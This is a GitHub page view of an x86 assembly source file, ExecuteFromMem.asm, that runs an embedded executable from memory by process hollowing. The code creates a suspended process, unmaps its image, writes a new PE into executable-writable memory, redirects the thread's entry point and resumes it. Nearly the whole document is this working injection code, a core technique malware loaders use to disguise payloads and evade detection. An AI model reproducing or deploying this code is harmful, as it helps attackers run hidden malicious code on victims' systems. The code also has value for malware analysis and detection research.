-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathExecuteFromMem.asm
More file actions
113 lines (68 loc) · 2.45 KB
/
ExecuteFromMem.asm
File metadata and controls
113 lines (68 loc) · 2.45 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
; ::::: Running Process from memory :::::
; ::::: GamingMasteR -AT4RE :::::
.386p
.model flat, stdcall
option casemap: none
include windows.inc
include kernel32.inc
include ntdll.inc
include ExecuteFromMem.Inc
includelib kernel32.lib
includelib ntdll.lib
.data
myname db "ExecuteFromMem.exe",0
.data?
.code
main proc
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword
LOCAL sec: ptr IMAGE_SECTION_HEADER
LOCAL cnt: CONTEXT
invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
; create any process in suspend mode, and out progy is the best choice of course ;)
invoke CreateProcess, addr myname, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
mov cnt.ContextFlags, CONTEXT_INTEGER
; save the main thread context
invoke GetThreadContext, pinfo.hThread, addr cnt
invoke GetModuleHandle, 0
; unmap all the process's sections, and since they are sequenced then they are all unmapped one time
invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
mov edi, offset file
add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
assume edi: ptr IMAGE_NT_HEADERS
; reallocate memory for the new process @ base == ImageBase and size == SizeOfImage
invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
mov base, eax
; write the new process's header
invoke WriteProcessMemory, pinfo.hProcess, base, addr file, [edi].OptionalHeader.SizeOfHeaders, 0
; get the 1st section header b4 entering the loop
lea eax, [edi].OptionalHeader
mov sec, eax
movzx eax, [edi].FileHeader.SizeOfOptionalHeader
add sec, eax
xor eax, eax
xor esi, esi
xor ecx, ecx
.while ( si < [edi].FileHeader.NumberOfSections )
imul eax, esi, sizeof IMAGE_SECTION_HEADER
add eax, sec
mov ebx, base
add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
mov edx, offset file
add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
; write every section data
invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
inc esi
.endw
mov eax, base
add eax, [edi].OptionalHeader.AddressOfEntryPoint
mov cnt.regEax, eax
; make the new process's main thread eax register == the new entry point
invoke SetThreadContext, pinfo.hThread, addr cnt
; fire it :p
invoke ResumeThread, pinfo.hThread
ret
main endp
end main